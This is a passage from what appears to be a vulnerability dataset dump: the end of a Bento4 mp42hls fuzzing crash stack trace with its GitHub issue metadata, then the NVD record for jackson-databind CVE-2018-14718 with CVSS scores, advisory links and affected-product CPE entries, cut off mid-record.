#10 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194
#11 0x561a5ffbe494 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4SampleEntry.cpp:115
#12 0x561a5ffc2710 in AP4_VisualSampleEntry::AP4_VisualSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4SampleEntry.cpp:742
#13 0x561a5ffc3f00 in AP4_AvcSampleEntry::AP4_AvcSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4SampleEntry.cpp:994
#14 0x561a5ff40e2d in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:306
#15 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221
#16 0x561a5ffd4ce5 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4StsdAtom.cpp:101
#17 0x561a5ffd4553 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4StsdAtom.cpp:57
#18 0x561a5ff41ca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:424
#19 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221
#20 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194
#21 0x561a5ff51030 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:139
#22 0x561a5ff50b8e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:88
#23 0x561a5ff43519 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:764
#24 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221
#25 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194
#26 0x561a5ff51030 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:139
#27 0x561a5ff50b8e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:88
#28 0x561a5ff43519 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:764
#29 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221
#30 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194
#31 0x561a5ff51030 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:139
#32 0x561a5ff50b8e in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:88
#33 0x561a5ff43519 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:764
#34 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221
#35 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194
#36 0x561a5ff51030 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:139
#37 0x561a5ffeb530 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4TrakAtom.cpp:165
#38 0x561a5ff44589 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls+0x348589)
#39 0x561a5ff4193d in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:379
#40 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221
#41 0x561a5ff515bc in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:194
#42 0x561a5ff51030 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4ContainerAtom.cpp:139
#43 0x561a5ff83d52 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4MoovAtom.cpp:80
#44 0x561a5ff44523 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls+0x348523)
#45 0x561a5ff417b6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:359
#46 0x561a5ff40310 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:221
#47 0x561a5ff3f8d3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4AtomFactory.cpp:151
#48 0x561a5ff60849 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4File.cpp:104
#49 0x561a5ff604b8 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Core/Ap4File.cpp:78
#50 0x561a5ff2cec3 in main /home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1837
#51 0x7f8b9d4acb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#52 0x561a5ff20a89 in _start (/home/parallels/Desktop/Fuzz/Bento4/Bento4-SRC-1-5-1-627/cmakebuild/mp42hls+0x324a89)
```
FoundBy: [email protected] | Allocate for large amounts of memory failed in Ap4StcoAtom.cpp:81 at Bento4 1.5.1-627 when running mp42hls | https://api.github.com/repos/axiomatic-systems/Bento4/issues/350/comments | 2 | 2018-12-31T15:52:26Z | 2019-01-12T21:14:48Z | https://github.com/axiomatic-systems/Bento4/issues/350 | 394,998,583 | 350 |
CVE-2018-14718 | 2019-01-02T18:29:00.310 | FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/106601"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHBA-2019:0959"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:0782"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:0877"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1782"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1797"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1822"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1823"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2804"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:2858"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3002"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3140"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3149"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:3892"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:4037"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/2097"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3E"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/May/68"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20190530-0003/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4452"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD",
"versionEndExcluding": "2.6.7.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B99066EB-FF79-4D9D-9466-B04AD4D3A814",
"versionEndExcluding": "2.7.9.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F4D3858C-DAF3-4522-90EC-EFCD13BD121E",
"versionEndExcluding": "2.8.11.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4DA01839-5250-43A7-AFB7-871DC9B8AB32",
"versionEndExcluding": "2.9.7",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.9.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "35AD0C07-9688-4397-8D45-FBB88C0F0C11",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8972497F-6E24-45A9-9A18-EB0E842CB1D4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*",
"matchCriteriaId": "400509A8-D6F2-432C-A2F1-AD5B8778D0D9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "132CE62A-FBFC-4001-81EC-35D81F73AF48",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B887E174-57AB-449D-AEE4-82DD1A3E5C84",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E869C417-C0E6-4FC3-B406-45598A1D1906",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7231AF76-3D46-41C4-83E9-6E9E12940BD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FD945A04-174C-46A2-935D-4F92631D1018",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "A9E97F04-00ED-48E9-AB40-7A02B3419641",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "FCCE5A11-39E7-4BBB-9E1A-BA4B754103BB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A5AEC7F5-C353-4CF5-96CE-8C713A2B0C92",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "BB79BB43-E0AB-4F0D-A6EA-000485757EEC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.3:*:*:*:*:*:*:*",
"matchCriteriaId": "F238CB66-886D-47E8-8DC0-7FC2025771EB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.4:*:*:*:*:*:*:*",
"matchCriteriaId": "59B7B8AD-1210-4C40-8EF7-E2E8156630A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.5:*:*:*:*:*:*:*",
"matchCriteriaId": "0DE4A291-4358-42A9-A68D-E59D9998A1CC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "0D19CF00-FE20-4690-AAB7-8E9DBC68A94F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7:*:*:*:*:*:*:*",
"matchCriteriaId": "A030A498-3361-46F8-BB99-24A66CAE11CA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F6455EB1-C741-45E8-A53E-E7AD7A5D00EE",
"versionEndExcluding": "11.2.0.3.23",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BFD43191-E67F-4D1B-967B-3C7B20331945",
"versionEndExcluding": "12.2.0.1.19",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "12.2.0.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "062C588A-CBBA-470F-8D11-2F961922E927",
"versionEndExcluding": "13.9.4.2.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "13.9.4.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "989598A3-7012-4F57-B172-02404E20D16D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "042C243F-EDFE-4A04-AB0B-26E73CC34837",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*",
"matchCriteriaId": "63C59FA7-F321-4475-9F71-D78E0C890866",
"versionEndExcluding": "19.3.12",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:nosql_database:19.3.12:*:*:*:*:*:*:*",
"matchCriteriaId": "9E215743-2B5D-4EA5-A8F5-BBEC4DC85C35",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7A1E1023-2EB9-4334-9B74-CA71480F71C2",
"versionEndExcluding": null,
"versionEndIncluding": "17.12",
"versionStartExcluding": null,
"versionStartIncluding": "17.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "93A4E178-0082-45C5-BBC0-0A4E51C8B1DE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2:*:*:*:*:*:*:*",
"matchCriteriaId": "3F021C23-AB9B-4877-833F-D01359A98762",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
